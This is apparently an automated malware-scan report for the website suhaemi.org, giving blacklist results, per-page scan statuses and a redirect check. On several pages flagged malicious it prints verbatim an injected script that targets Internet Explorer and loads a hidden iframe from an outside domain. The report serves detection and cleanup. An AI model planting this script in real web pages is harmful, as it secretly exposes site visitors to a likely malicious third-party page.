Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=suhaemi.org
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://suhaemi.org/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://suhaemi.org/ | 200 OK Content-Length: 130934 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
    var cookieString = document.cookie;
    IE='\v'=='v'
    var start = cookieString.indexOf("upda43tebng=");
    if (IE && start == -1){
        var expires = new Date();
        expires.setTime(expires.getTime()+3*3600*1000);
        document.cookie = "upda43tebng=update;expires="+expires.toGMTString();
        document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>')
        fr=document.getElementById('hfrd')
        setTimeout('fr.style.display="none"', 6000)
    }
Antivirus reports:
http://www.suhaemi.org/mambots/content/AC_RunActiveContent.js | 200 OK Content-Length: 8321 Content-Type: application/javascript | clean |
http://www.suhaemi.org/modules/fatAjax.php | 200 OK Content-Length: 12955 Content-Type: application/x-javascript | clean |
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=in | 200 OK Content-Length: 2512 Content-Type: text/javascript | clean |
http://suhaemi.org/wedding/ | 200 OK Content-Length: 4727 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: wedding.suhaemi.org
...[3691 bytes skipped]... gai, --> <!-- sedikitpun, semoga, serta, sinarilah, soekarno, sore, suatu, suci, suhaedah, --> <!-- sumedang, sunah, sunnah, tak, tali, tanya, teguh, telah, temani, terdalam, --> <!-- terindah, terlinta, terminal, tetap, tiba, tina, tlah, tol, tuk, uin, untuk, --> <!-- via, waktu, warahmah, wassalaamu, wb, wib, wr, ya, yang --> <!-- urls used in the movie --> <!-- http://wedding.suhaemi.org/peta.jpg --> <!-- Created by SWiSHmax - Flash Made Easy - www.swishzone.com --> <style type="text/css"> <!-- body { background-color: #000000; } --> </style></head> <body> <center> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,42,0" id="undangan" width="800" h ...[640 bytes skipped]...
http://suhaemi.org/test404page.js | 200 OK Content-Length: 130966 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
    var cookieString = document.cookie;
    IE='\v'=='v'
    var start = cookieString.indexOf("upda43tebng=");
    if (IE && start == -1){
        var expires = new Date();
        expires.setTime(expires.getTime()+3*3600*1000);
        document.cookie = "upda43tebng=update;expires="+expires.toGMTString();
        document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>')
        fr=document.getElementById('hfrd')
        setTimeout('fr.style.display="none"', 6000)
    }
Antivirus reports:
http://suhaemi.org/gallery | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 23 Sep 2014 22:51:16 GMT Location: http://suhaemi.org/gallery/ Server: Apache Vary: Accept-Encoding Content-Length: 335 Content-Type: text/html; charset=iso-8859-1 | clean |
http://suhaemi.org/gallery/ | HTTP/1.1 302 Found Connection: close Date: Tue, 23 Sep 2014 22:51:16 GMT Location: http://suhaemi.org/gallery/main.php Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.6-3ubuntu4.6 | clean |
http://suhaemi.org/gallery/main.php | 200 OK Content-Length: 2266 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
    var cookieString = document.cookie;
    IE='\v'=='v'
    var start = cookieString.indexOf("upda43tebng=");
    if (IE && start == -1){
        var expires = new Date();
        expires.setTime(expires.getTime()+3*3600*1000);
        document.cookie = "upda43tebng=update;expires="+expires.toGMTString();
        document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>')
        fr=document.getElementById('hfrd')
        setTimeout('fr.style.display="none"', 6000)
    }
Antivirus reports:
http://suhaemi.org/administrator/ | 200 OK Content-Length: 2241 Content-Type: text/html | clean |
http://suhaemi.org/index.php?date=2014-10-01 | 200 OK Content-Length: 131468 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
    var cookieString = document.cookie;
    IE='\v'=='v'
    var start = cookieString.indexOf("upda43tebng=");
    if (IE && start == -1){
        var expires = new Date();
        expires.setTime(expires.getTime()+3*3600*1000);
        document.cookie = "upda43tebng=update;expires="+expires.toGMTString();
        document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>')
        fr=document.getElementById('hfrd')
        setTimeout('fr.style.display="none"', 6000)
    }
Antivirus reports:
http://suhaemi.org/index.php?date=2014-09-01 | 200 OK Content-Length: 130959 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
    var cookieString = document.cookie;
    IE='\v'=='v'
    var start = cookieString.indexOf("upda43tebng=");
    if (IE && start == -1){
        var expires = new Date();
        expires.setTime(expires.getTime()+3*3600*1000);
        document.cookie = "upda43tebng=update;expires="+expires.toGMTString();
        document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>')
        fr=document.getElementById('hfrd')
        setTimeout('fr.style.display="none"', 6000)
    }
Antivirus reports:
http://suhaemi.org/rpl/src/rpl.zip | 200 OK Content-Length: 47261 Content-Type: application/zip | clean |
http://suhaemi.org/dl/vector-linux.rar | 200 OK Content-Length: 300932 Content-Type: application/rar | clean |
http://suhaemi.org/index.php?date=2014-11-01 | 200 OK Content-Length: 132191 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
    var cookieString = document.cookie;
    IE='\v'=='v'
    var start = cookieString.indexOf("upda43tebng=");
    if (IE && start == -1){
        var expires = new Date();
        expires.setTime(expires.getTime()+3*3600*1000);
        document.cookie = "upda43tebng=update;expires="+expires.toGMTString();
        document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>')
        fr=document.getElementById('hfrd')
        setTimeout('fr.style.display="none"', 6000)
    }
Antivirus reports:
http://suhaemi.org/index.php?date=2014-12-01 | 200 OK Content-Length: 131441 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
    var cookieString = document.cookie;
    IE='\v'=='v'
    var start = cookieString.indexOf("upda43tebng=");
    if (IE && start == -1){
        var expires = new Date();
        expires.setTime(expires.getTime()+3*3600*1000);
        document.cookie = "upda43tebng=update;expires="+expires.toGMTString();
        document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>')
        fr=document.getElementById('hfrd')
        setTimeout('fr.style.display="none"', 6000)
    }
Antivirus reports:
http://suhaemi.org/index.php?date=2015-01-01 | 200 OK Content-Length: 131475 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
    var cookieString = document.cookie;
    IE='\v'=='v'
    var start = cookieString.indexOf("upda43tebng=");
    if (IE && start == -1){
        var expires = new Date();
        expires.setTime(expires.getTime()+3*3600*1000);
        document.cookie = "upda43tebng=update;expires="+expires.toGMTString();
        document.write('<iframe src="http://hinnws.com/tets.html" id="hfrd" height="100" width="100"></iframe>')
        fr=document.getElementById('hfrd')
        setTimeout('fr.style.display="none"', 6000)
    }
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: suhaemi.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Sep 2014 22:51:02 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: sessioncookie=44d7d61c93e4e338c9e3809adbe5b402; expires=Wed, 24-Sep-2014 10:51:02 GMT; path=/
Set-Cookie: mosvisitor=1
X-Powered-By: PHP/5.2.6-3ubuntu4.6
Second query (visit from search engine):
GET / HTTP/1.1
Host: suhaemi.org
Referer: http://www.google.com/search?q=suhaemi.org
Result:
The result is similar to the first query. There are no suspicious redirects found.